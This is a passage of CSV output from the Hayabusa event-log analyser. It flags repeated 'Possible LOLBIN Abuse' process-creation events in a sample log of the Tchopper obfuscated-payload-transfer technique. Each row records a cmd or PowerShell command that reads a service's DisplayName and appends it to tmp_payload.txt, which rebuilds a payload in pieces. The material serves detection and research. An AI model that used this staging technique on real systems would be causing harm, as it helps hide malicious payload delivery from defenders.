0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 